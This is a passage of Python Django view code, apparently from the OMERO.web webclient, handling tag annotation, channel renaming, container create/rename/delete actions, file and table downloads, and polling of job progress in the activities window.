    selected = getIds(request)
    obj_count = sum([len(selected[types]) for types in selected])
    # Get appropriate manager, either to list available Tags to add to single
    # object, or list ALL Tags (multiple objects)
    manager = None
    self_id = conn.getEventContext().userId
    tags = []
    # Use the first object we find to set context (assume all objects are
    # in same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    # Make a list of all current tags
    # As would be on right column of tagging dialog...
    taglist, users = tree.marshal_annotations(
        conn,
        project_ids=selected["projects"],
        dataset_ids=selected["datasets"],
        image_ids=selected["images"],
        screen_ids=selected["screens"],
        plate_ids=selected["plates"],
        run_ids=selected["acquisitions"],
        well_ids=selected["wells"],
        ann_type="tag",
        # If we reach this limit we'll get some tags not removed
        limit=ANNOTATIONS_LIMIT,
    )
    # Index the annotation owners by their experimenter ID
    userMap = {}
    for exp in users:
        userMap[exp["id"]] = exp
    # For batch annotate, only include tags that user has added to all objects
    if obj_count > 1:
        # count my links
        myLinkCount = {}
        for t in taglist:
            tid = t["id"]
            if tid not in myLinkCount:
                myLinkCount[tid] = 0
            if t["link"]["owner"]["id"] == self_id:
                myLinkCount[tid] += 1
        # filter
        taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
    selected_tags = []
    for tag in taglist:
        linkOwnerId = tag["link"]["owner"]["id"]
        owner = userMap[linkOwnerId]
        ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
        canDelete = True
        created = tag["link"]["date"]
        linkOwned = linkOwnerId == self_id
        selected_tags.append(
            (tag["id"], self_id, ownerName, canDelete, created, linkOwned)
        )
    # selected_tags is really a list of tag LINKS.
    # May be several links per tag.id
    selected_tags.sort(key=lambda x: x[0])
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    if request.method == "POST":
        # handle form submission
        form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
        newtags_formset = NewTagsAnnotationFormSet(
            prefix="newtags", data=request.POST.copy()
        )
        # Create new tags or Link existing tags...
        if form_tags.is_valid() and newtags_formset.is_valid():
            # filter down previously selected tags to the ones linked by
            # current user
            selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
            # Remove duplicates from tag IDs
            selected_tag_ids = list(set(selected_tag_ids))
            post_tags = list(form_tags.cleaned_data["tags"])
            # tags to newly link; removed = previously linked but not posted
            tags = [tag for tag in post_tags if tag not in selected_tag_ids]
            removed = [tag for tag in selected_tag_ids if tag not in post_tags]
            manager = BaseContainer(conn)
            if tags:
                manager.createAnnotationsLinks("tag", tags, oids)
            new_tags = []
            for form in newtags_formset.forms:
                new_tags.append(
                    manager.createTagAnnotations(
                        form.cleaned_data["tag"],
                        form.cleaned_data["description"],
                        oids,
                        tag_group_id=form.cleaned_data["tagset"],
                    )
                )
            # only remove Tags where the link is owned by self_id
            for remove in removed:
                tag_manager = BaseContainer(conn, tag=remove)
                tag_manager.remove(
                    [
                        "%s-%s" % (dtype, obj.id)
                        for dtype, objs in oids.items()
                        for obj in objs
                    ],
                    tag_owner_id=self_id,
                )
            return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
        else:
            # TODO: handle invalid form error
            return HttpResponse(str(form_tags.errors))
    else:
        form_tags = TagsAnnotationForm(initial=initial)
        newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
    context = {
        "form_tags": form_tags,
        "newtags_formset": newtags_formset,
        "selected_tags": selected_tags,
    }
    template = "webclient/annotations/tags_form.html"
    context["template"] = template
    return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
    """
    Edit and save channel names.

    Channel names come from POST params "channel0", "channel1", ... If the
    'Apply to Dataset/Plate' button was used ("confirm_apply" present), the
    names are applied to all images under the posted "parentId"
    (e.g. "dataset-234" or "plate-123"); otherwise only to this image.
    Returns a dict with the saved names and update counts, or an error dict.
    """
    image = conn.getObject("Image", imageId)
    sizeC = image.getSizeC()
    channelNames = {}
    nameDict = {}
    for i in range(sizeC):
        cname = request.POST.get("channel%d" % i, None)
        if cname is not None:
            cname = smart_str(cname)[:255]  # Truncate to fit in DB
            channelNames["channel%d" % i] = cname
            nameDict[i + 1] = cname
    # Bug fix: initialise counts so a missing parentId below returns the
    # error dict instead of raising NameError at 'if counts:'.
    counts = None
    # If the 'Apply to Dataset' button was used to submit...
    if request.POST.get("confirm_apply", None) is not None:
        # plate-123 OR dataset-234
        parentId = request.POST.get("parentId", None)
        if parentId is not None:
            ptype = parentId.split("-")[0].title()
            pid = long(parentId.split("-")[1])
            counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
    else:
        counts = conn.setChannelNames("Image", [image.getId()], nameDict)
    rv = {"channelNames": channelNames}
    if counts:
        rv["imageCount"] = counts["imageCount"]
        rv["updateCount"] = counts["updateCount"]
        return rv
    else:
        return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
    request, action, o_type=None, o_id=None, conn=None, **kwargs
):
    """
    Handles many different actions on various objects.

    @param action:  "addnewcontainer", (creates a new Project, Dataset,
                    Screen), "editname", "savename", "editdescription",
                    "savedescription", (used as GET and POST for in-line
                    editing),
                    "removefromshare", (tree P/D/I moving etc)
                    "delete", "deletemany" (delete objects)
                    "remove" (remove tag/comment from object)
    @param o_type:  "dataset", "project", "image", "screen", "plate",
                    "acquisition", "well","comment", "file", "tag",
                    "tagset","share", "sharecomment"

    Most actions return JSON; the in-line edit actions return a template
    context dict rendered by render_response().
    NOTE(review): an unrecognised action falls through to the final
    'context["template"]' line with 'context' unbound (NameError) -
    callers are expected to pass only the actions listed above.
    """
    template = None
    manager = None
    # Build a manager wrapping the target object (if any)
    if o_type in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        kw = {}
        if o_type is not None and int(o_id) > 0:
            o_id = int(o_id)
            kw[str(o_type)] = o_id
        try:
            manager = BaseContainer(conn, **kw)
        except AttributeError as x:
            return handlerInternalError(request, x)
    elif o_type in ("share", "sharecomment", "chat"):
        manager = BaseShare(conn, o_id)
    else:
        manager = BaseContainer(conn)
    form = None
    if action == "addnewcontainer":
        # Used within the jsTree to add a new Project, Dataset, Tag,
        # Tagset etc under a specified parent OR top-level
        if not request.method == "POST":
            return JsonResponse(
                {"Error": "Must use POST to create container"}, status=405
            )
        form = ContainerForm(data=request.POST.copy())
        if form.is_valid():
            logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
            name = form.cleaned_data["name"]
            description = form.cleaned_data["description"]
            owner = form.cleaned_data["owner"]
            if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
                oid = manager.createDataset(name, description, owner=owner)
            elif o_type == "tagset" and o_id > 0:
                oid = manager.createTag(name, description, owner=owner)
            elif request.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                # No parent specified. We can create orphaned 'project',
                # 'dataset' etc.
                folder_type = request.POST.get("folder_type")
                if folder_type == "dataset":
                    oid = manager.createDataset(
                        name,
                        description,
                        owner=owner,
                        img_ids=request.POST.getlist("image", None),
                    )
                else:
                    oid = conn.createContainer(
                        folder_type, name, description, owner=owner
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            rdict = {"bad": "false", "id": oid}
            return JsonResponse(rdict)
        else:
            # Report form validation errors back to the client
            d = dict()
            for e in form.errors.items():
                d.update({e[0]: unicode(e[1])})
            rdict = {"bad": "true", "errs": d}
            return JsonResponse(rdict)
    elif action == "edit":
        # form for editing Shares only
        if o_id is None:
            raise Http404("No share ID")
        if o_type == "share" and int(o_id) > 0:
            template = "webclient/public/share_form.html"
            manager.getMembers(o_id)
            manager.getComments(o_id)
            experimenters = list(conn.getExperimenters())
            experimenters.sort(key=lambda x: x.getOmeName().lower())
            initial = {
                "message": manager.share.message,
                "expiration": "",
                "shareMembers": manager.membersInShare,
                "enable": manager.share.active,
                "experimenters": experimenters,
            }
            if manager.share.getExpireDate() is not None:
                initial["expiration"] = manager.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            form = ShareForm(initial=initial)  # 'guests':share.guestsInShare,
            context = {"manager": manager, "form": form}
    elif action == "save":
        # Handles submission of the 'edit' form above. TODO: not used now?
        if not request.method == "POST":
            return HttpResponseRedirect(
                reverse("manage_action_containers", args=["edit", o_type, o_id])
            )
        if o_type == "share":
            experimenters = list(conn.getExperimenters())
            experimenters.sort(key=lambda x: x.getOmeName().lower())
            form = ShareForm(
                initial={"experimenters": experimenters}, data=request.POST.copy()
            )
            if form.is_valid():
                logger.debug("Update share: %s" % (str(form.cleaned_data)))
                message = form.cleaned_data["message"]
                expiration = form.cleaned_data["expiration"]
                members = form.cleaned_data["members"]
                # guests = request.POST['guests']
                enable = form.cleaned_data["enable"]
                host = "%s?server=%i" % (
                    request.build_absolute_uri(
                        reverse("load_template", args=["public"])
                    ),
                    int(conn.server_id),
                )
                manager.updateShareOrDiscussion(
                    host, message, members, enable, expiration
                )
                r = "enable" if enable else "disable"
                return HttpResponse(r)
            else:
                template = "webclient/public/share_form.html"
                context = {"share": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "editname":
        # start editing 'name' in-line
        if hasattr(manager, o_type) and o_id > 0:
            obj = getattr(manager, o_type)
            template = "webclient/ajax_form/container_form_ajax.html"
            if o_type == "tag":
                txtValue = obj.textValue
            else:
                txtValue = obj.getName()
            form = ContainerNameForm(initial={"name": txtValue})
            context = {"manager": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "savename":
        # Save name edit in-line
        if not request.method == "POST":
            return HttpResponseRedirect(
                reverse("manage_action_containers", args=["edit", o_type, o_id])
            )
        if hasattr(manager, o_type) and o_id > 0:
            form = ContainerNameForm(data=request.POST.copy())
            if form.is_valid():
                logger.debug("Update name form:" + str(form.cleaned_data))
                name = form.cleaned_data["name"]
                rdict = {"bad": "false", "o_type": o_type}
                manager.updateName(o_type, name)
                return JsonResponse(rdict)
            else:
                d = dict()
                for e in form.errors.items():
                    d.update({e[0]: unicode(e[1])})
                rdict = {"bad": "true", "errs": d}
                return JsonResponse(rdict)
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "editdescription":
        # start editing description in-line
        if hasattr(manager, o_type) and o_id > 0:
            obj = getattr(manager, o_type)
            template = "webclient/ajax_form/container_form_ajax.html"
            form = ContainerDescriptionForm(initial={"description": obj.description})
            context = {"manager": manager, "form": form}
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "savedescription":
        # Save editing of description in-line
        if not request.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (action, o_type, o_id)
            )
        if hasattr(manager, o_type) and o_id > 0:
            form = ContainerDescriptionForm(data=request.POST.copy())
            if form.is_valid():
                logger.debug("Update name form:" + str(form.cleaned_data))
                description = form.cleaned_data["description"]
                manager.updateDescription(o_type, description)
                rdict = {"bad": "false"}
                return JsonResponse(rdict)
            else:
                d = dict()
                for e in form.errors.items():
                    d.update({e[0]: unicode(e[1])})
                rdict = {"bad": "true", "errs": d}
                return JsonResponse(rdict)
        else:
            return HttpResponseServerError("Object does not exist")
    elif action == "remove":
        # Handles removal of comment, tag from
        # Object etc.
        # E.g. image-123 or image-1|image-2
        parents = request.POST["parent"]
        try:
            manager.remove(parents.split("|"))
        except Exception as x:
            logger.error(traceback.format_exc())
            rdict = {"bad": "true", "errs": str(x)}
            return JsonResponse(rdict)
        rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "removefromshare":
        image_id = request.POST.get("source")
        try:
            manager.removeImage(image_id)
        except Exception as x:
            logger.error(traceback.format_exc())
            rdict = {"bad": "true", "errs": str(x)}
            return JsonResponse(rdict)
        rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "delete":
        # Handles delete of a file attached to object.
        child = toBoolean(request.POST.get("child"))
        anns = toBoolean(request.POST.get("anns"))
        try:
            handle = manager.deleteItem(child, anns)
            # Register the async delete so progress can be polled later
            request.session["callback"][str(handle)] = {
                "job_type": "delete",
                "delmany": False,
                "did": o_id,
                "dtype": o_type,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(handle),
                "start_time": datetime.datetime.now(),
            }
            request.session.modified = True
        except Exception as x:
            logger.error(
                "Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
            )
            rdict = {"bad": "true", "errs": str(x)}
        else:
            rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "deletemany":
        # Handles multi-delete from jsTree.
        object_ids = {
            "Image": request.POST.getlist("image"),
            "Dataset": request.POST.getlist("dataset"),
            "Project": request.POST.getlist("project"),
            "Annotation": request.POST.getlist("tag"),
            "Screen": request.POST.getlist("screen"),
            "Plate": request.POST.getlist("plate"),
            "Well": request.POST.getlist("well"),
            "PlateAcquisition": request.POST.getlist("acquisition"),
        }
        child = toBoolean(request.POST.get("child"))
        anns = toBoolean(request.POST.get("anns"))
        logger.debug(
            "Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
        )
        try:
            for key, ids in object_ids.items():
                if ids is not None and len(ids) > 0:
                    handle = manager.deleteObjects(key, ids, child, anns)
                    if key == "PlateAcquisition":
                        key = "Plate Run"  # for nicer user message
                    dMap = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(handle),
                        "dtype": key,
                    }
                    if len(ids) > 1:
                        dMap["delmany"] = len(ids)
                        dMap["did"] = ids
                    else:
                        dMap["delmany"] = False
                        dMap["did"] = ids[0]
                    request.session["callback"][str(handle)] = dMap
            request.session.modified = True
        except Exception:
            logger.error(
                "Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
            )
            # Ajax error handling will allow user to submit bug report
            raise
        else:
            rdict = {"bad": "false"}
            return JsonResponse(rdict)
    context["template"] = template
    return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
    """
    Returns the specified original file as an http response. Used for
    displaying text or png/jpeg etc files in browser.

    With download=True an attachment Content-Disposition is added.
    """
    # May be viewing results of a script run in a different group.
    conn.SERVICE_OPTS.setOmeroGroup(-1)
    file_obj = conn.getObject("OriginalFile", fileId)
    if file_obj is None:
        return handlerInternalError(
            request, "Original File does not exist (id:%s)." % (fileId)
        )
    # Stream the file in chunks; response closes the connection when done
    response = ConnCleaningHttpResponse(
        file_obj.getFileInChunks(buf=settings.CHUNK_SIZE)
    )
    response.conn = conn
    content_type = file_obj.mimetype
    if content_type == "text/x-python":
        content_type = "text/plain"  # allows display in browser
    response["Content-Type"] = content_type
    response["Content-Length"] = file_obj.getSize()
    if download:
        fname = file_obj.name.replace(" ", "_").replace(",", ".")
        response["Content-Disposition"] = "attachment; filename=%s" % fname
    return response
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
    """
    Download OMERO.table as CSV (streaming response) or return as HTML or json

    Request parameters:
        header: 'false' excludes the column names row if mtype is 'csv'
        offset: table rows offset for pagination
        limit:  table rows limit for pagination
        query:  OMERO.table query for filtering rows

    @param file_id:     OriginalFile ID
    @param mtype:       None for html table or 'csv' or 'json'
    @param conn:        BlitzGateway connection
    """
    query = request.GET.get("query", "*")
    offset = get_long_or_default(request, "offset", 0)
    limit = get_long_or_default(request, "limit", settings.PAGE)
    # Optional link to OMERO.iviewer, if that app is installed
    iviewer_url = None
    try:
        iviewer_url = reverse("omero_iviewer_index")
    except NoReverseMatch:
        pass
    # Check if file exists since _table_query() doesn't check
    file_id = long(file_id)
    orig_file = conn.getObject("OriginalFile", file_id)
    if orig_file is None:
        raise Http404("OriginalFile %s not found" % file_id)
    # For CSV we read rows lazily so they can be streamed
    lazy = mtype == "csv"
    context = webgateway_views._table_query(
        request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
    )
    if context.get("error") or not context.get("data"):
        return JsonResponse(context)
    # OR, return as csv or html
    if mtype == "csv":
        table_data = context.get("data")
        hide_header = request.GET.get("header") == "false"
        def csv_gen():
            # Stream the CSV a page of rows at a time
            if not hide_header:
                csv_cols = ",".join(table_data.get("columns"))
                yield csv_cols
            for rows in table_data.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
                )
        downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
        downloadName = downloadName + ".csv"
        rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
        rsp.conn = conn
        rsp.table = context.get("table")
        rsp["Content-Type"] = "application/force-download"
        # rsp['Content-Length'] = ann.getFileSize()
        rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
        return rsp
    context["data"]["name"] = orig_file.name
    context["data"]["path"] = orig_file.path
    context["data"]["id"] = file_id
    context["meta"]["query"] = query
    # check if offset matches an integer page number:
    if offset == 0 or offset / limit == offset // limit:
        context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
    # pagination links
    url = reverse("omero_table", args=[file_id])
    context["meta"]["url"] = url
    url += "?limit=%s" % limit
    if query != "*":
        url += "&query=%s" % query
    if (offset + limit) < context["meta"]["totalCount"]:
        context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
    if offset > 0:
        context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
    # by default, return context as JSON data
    if mtype is None:
        context["template"] = "webclient/annotations/omero_table.html"
        context["iviewer_url"] = iviewer_url
        col_types = context["data"]["column_types"]
        if "ImageColumn" in col_types:
            context["image_column_index"] = col_types.index("ImageColumn")
        if "WellColumn" in col_types:
            context["well_column_index"] = col_types.index("WellColumn")
        if "RoiColumn" in col_types:
            context["roi_column_index"] = col_types.index("RoiColumn")
        # we don't use ShapeColumn type - just check name and LongColumn type...
        # TODO: when ShapeColumn is supported, add handling to this code
        cnames = [n.lower() for n in context["data"]["columns"]]
        if "shape" in cnames and col_types[cnames.index("shape")] == "LongColumn":
            context["shape_column_index"] = cnames.index("shape")
        # provide example queries - pick first DoubleColumn...
        for idx, c_type in enumerate(col_types):
            if c_type in ("DoubleColumn", "LongColumn"):
                col_name = context["data"]["columns"][idx]
                # find first few non-empty cells...
                vals = []
                for row in context["data"]["rows"]:
                    if row[idx]:
                        vals.append(row[idx])
                        if len(vals) > 3:
                            break
                if " " in col_name or len(vals) < 2:
                    # Don't support queries on columns with spaces
                    continue
                context["example_column"] = col_name
                context["example_min_value"] = min(vals)
                context["example_max_value"] = max(vals)
                break
    return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
    """Stream a FileAnnotation's file back to the client as a download.

    The connection is not cleaned up by the decorator; instead the
    ConnCleaningHttpResponse closes it once streaming has finished.
    """
    annotation = conn.getObject("FileAnnotation", annId)
    if annotation is None:
        return handlerInternalError(
            request, "FileAnnotation does not exist (id:%s)." % (annId)
        )
    # Stream the file in chunks so large files never sit fully in memory
    chunks = annotation.getFileInChunks(buf=settings.CHUNK_SIZE)
    response = ConnCleaningHttpResponse(chunks)
    response.conn = conn  # response closes this connection when done
    safe_name = annotation.getFileName().replace(" ", "_")
    response["Content-Type"] = "application/force-download"
    response["Content-Length"] = annotation.getFileSize()
    response["Content-Disposition"] = "attachment; filename=%s" % (safe_name)
    return response
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
    """Serve the image's 'Original Metadata' as a plain-text attachment."""
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    om = image.loadOriginalMetadata()
    # om[1] holds the global metadata key/value pairs, om[2] the series ones
    lines = ["[Global Metadata]"]
    for key, value in om[1]:
        lines.append("%s=%s" % (key, value))
    lines.append("[Series Metadata]")
    for key, value in om[2]:
        lines.append("%s=%s" % (key, value))
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
    """
    Page displays a simple "Preparing download..." message and redirects to
    the 'url'.
    We construct the url and query string from request: 'url' and 'ids'.
    """
    # 'format' present => export (e.g. JPEG/PNG); absent => original files
    format = request.GET.get("format", None)
    if format is not None:
        download_url = reverse("download_as")
        zipName = "Export_as_%s" % format
    else:
        download_url = reverse("archived_files")
        zipName = "OriginalFileDownload"
    targetIds = request.GET.get("ids")  # E.g. image-1|image-2
    defaultName = request.GET.get("name", zipName)  # default zip name
    defaultName = os.path.basename(defaultName)  # remove path
    if targetIds is None:
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    ids = targetIds.split("|")
    fileLists = []
    fileCount = 0
    filesTotalSize = 0
    # If we're downloading originals, list original files so user can
    # download individual files.
    if format is None:
        imgIds = []
        wellIds = []
        for i in ids:
            if i.split("-")[0] == "image":
                imgIds.append(i.split("-")[1])
            elif i.split("-")[0] == "well":
                wellIds.append(i.split("-")[1])
        images = []
        # Get images...
        if imgIds:
            images = list(conn.getObjects("Image", imgIds))
        if len(images) == 0:
            raise Http404("No images found.")
        # Have a list of files per fileset (or per image without fileset)
        fsIds = set()
        fileIds = set()
        for image in images:
            fs = image.getFileset()
            if fs is not None:
                # Make sure we've not processed this fileset before.
                if fs.id in fsIds:
                    continue
                fsIds.add(fs.id)
            files = list(image.getImportedImageFiles())
            fList = []
            for f in files:
                # de-duplicate files shared between images
                if f.id in fileIds:
                    continue
                fileIds.add(f.id)
                fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
                filesTotalSize += f.getSize()
            if len(fList) > 0:
                fileLists.append(fList)
        fileCount = sum([len(fList) for fList in fileLists])
    else:
        # E.g. JPEG/PNG - 1 file per image
        fileCount = len(ids)
    # E.g. "image-1|image-2" becomes "image=1&image=2"
    query = "&".join([_id.replace("-", "=") for _id in ids])
    download_url = download_url + "?" + query
    if format is not None:
        download_url = download_url + "&format=%s" % format
    context = {
        "template": "webclient/annotations/download_placeholder.html",
        "url": download_url,
        "defaultName": defaultName,
        "fileLists": fileLists,
        "fileCount": fileCount,
        "filesTotalSize": filesTotalSize,
    }
    # Warn in the UI when the zip would exceed the configured size limit
    if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
    """
    Load the calendar displayed in the left panel of the history page.

    Shows the current month when no year/month is supplied; entries are
    filtered to the experimenter id stored in the session.
    """
    eid = request.session.get("user_id")
    if year is None or month is None:
        # No complete date supplied - fall back to the current month
        now = datetime.datetime.today()
        year, month = now.year, now.month
    controller = BaseCalendar(conn=conn, year=year, month=month, eid=eid)
    controller.create_calendar()
    return {
        "controller": controller,
        "template": "webclient/history/calendar.html",
    }
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
    """Load the centre-panel data for a single calendar date."""
    if year is None or month is None or day is None:
        raise Http404("Year, month, and day are required")
    # current page of results (defaults to the first page)
    page = int(request.GET.get("page", 1))
    eid = request.session.get("user_id")
    calendar = BaseCalendar(conn=conn, year=year, month=month, day=day, eid=eid)
    calendar.get_items(page)
    return {
        "controller": calendar,
        "template": "webclient/history/history_details.html",
    }
def getObjectUrl(conn, obj):
    """
    Provide a url to browse to the given omero.model object (P/D/I, S/P,
    FileAnnotation etc.); used to display results from the scripting
    service.
    E.g webclient/userdata/?path=image-12601
    If the object is a file annotation, try to browse to the parent P/D/I
    """
    base_url = reverse(viewname="load_template", args=["userdata"])
    # For a File Annotation, link to its first parent P/D/I instead
    if isinstance(obj, omero.model.FileAnnotationI):
        fa = conn.getObject("Annotation", obj.id.val)
        for ptype in ["project", "dataset", "image"]:
            links = list(fa.getParentLinks(ptype))
            if len(links) > 0:
                obj = links[0].parent
                break
    browsable = ("ImageI", "DatasetI", "ProjectI", "ScreenI", "PlateI", "WellI")
    kls = obj.__class__.__name__
    if kls in browsable:
        # E.g. ?show=image-123  (class name minus trailing 'I', lowercased)
        base_url += "?show=%s-%s" % (kls[:-1].lower(), obj.id.val)
    return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
    """Merge the given key/value pairs into one callback entry in the session."""
    entry = request.session["callback"][cbString]
    entry.update(kwargs)
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
    """
    This refreshes callback handles (delete, scripts, chgrp etc) and provides
    html to update Activities window & Progressbar.
    The returned html contains details for ALL callbacks in web session,
    regardless of their status.
    We also add counts of jobs, failures and 'in progress' to update status
    bar.
    """
    in_progress = 0
    failure = 0
    new_results = []
    _purgeCallback(request)
    # If we have a jobId (not added to request.session) just process it...
    # ONLY used for chgrp/chown dry-run.
    jobId = request.GET.get("jobId", None)
    if jobId is not None:
        jobId = str(jobId)
        try:
            prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
            status = prx.getStatus()
            logger.debug("job status: %s", status)
            rsp = prx.getResponse()
            if rsp is not None:
                rv = graphResponseMarshal(conn, rsp)
                rv["finished"] = True
            else:
                rv = {"finished": False}
            rv["status"] = {
                "currentStep": status.currentStep,
                "steps": status.steps,
                "startTime": status.startTime,
                "stopTime": status.stopTime,
            }
        except IceException:
            # handle no longer exists on the server - treat as done
            rv = {"finished": True}
        return rv
    elif request.method == "DELETE":
        # DELETE cancels a dry-run job (chgrp / chown)
        try:
            json_data = json.loads(request.body)
        except TypeError:
            # for Python 3.5
            json_data = json.loads(bytes_to_native_str(request.body))
        jobId = json_data.get("jobId", None)
        if jobId is not None:
            jobId = str(jobId)
            rv = {"jobId": jobId}
            try:
                prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
                status = prx.getStatus()
                logger.debug("pre-cancel() job status: %s", status)
                rv["status"] = {
                    "currentStep": status.currentStep,
                    "steps": status.steps,
                    "startTime": status.startTime,
                    "stopTime": status.stopTime,
                }
                prx.cancel()
            except omero.LockTimeout:
                # expected that it will take > 5 seconds to cancel
                logger.info("Timeout on prx.cancel()")
            return rv
    # test each callback for failure, errors, completion, results etc
    for cbString in request.session.get("callback").keys():
        callbackDict = request.session["callback"][cbString]
        job_type = callbackDict["job_type"]
        status = callbackDict["status"]
        if status == "failed":
            failure += 1
        request.session.modified = True
        # update chgrp / chown
        if job_type in ("chgrp", "chown"):
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    rsp = prx.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error(
                                    "%s failed with: %s" % (job_type, rsp_params)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report="%s %s" % (rsp.name, rsp_params),
                                    error=1,
                                )
                            elif isinstance(rsp, omero.cmd.OK):
                                update_callback(request, cbString, status="finished")
                        else:
                            in_progress += 1
                    finally:
                        # only fully close the server handle once finished
                        prx.close(close_handle)
                except Exception:
                    logger.info(
                        "Activities %s handle not found: %s" % (job_type, cbString)
                    )
                    continue
        elif job_type == "send_email":
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    callback = omero.callbacks.CmdCallbackI(
                        conn.c, prx, foreground_poll=True
                    )
                    rsp = callback.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error("send_email failed with: %s" % rsp_params)
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report={"error": rsp_params},
                                    error=1,
                                )
                            else:
                                total = (
                                    rsp.success
                                    + len(rsp.invalidusers)
                                    + len(rsp.invalidemails)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="finished",
                                    rsp={"success": rsp.success, "total": total},
                                )
                                if (
                                    len(rsp.invalidusers) > 0
                                    or len(rsp.invalidemails) > 0
                                ):
                                    invalidusers = [
                                        e.getFullName()
                                        for e in list(
                                            conn.getObjects(
                                                "Experimenter", rsp.invalidusers
                                            )
                                        )
                                    ]
                                    update_callback(
                                        request,
                                        cbString,
                                        report={
                                            "invalidusers": invalidusers,
                                            "invalidemails": rsp.invalidemails,
                                        },
                                    )
                        else:
                            in_progress += 1
                    finally:
                        callback.close(close_handle)
                except Exception:
                    logger.error(traceback.format_exc())
                    logger.info("Activities send_email handle not found: %s" % cbString)
        # update delete
        elif job_type == "delete":
            if status not in ("failed", "finished"):
                try:
                    handle = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    cb = omero.callbacks.CmdCallbackI(
                        conn.c, handle, foreground_poll=True
                    )
                    rsp = cb.getResponse()
                    close_handle = False
                    try:
                        if not rsp:  # Response not available
                            update_callback(
                                request,
                                cbString,
                                error=0,
                                status="in progress",
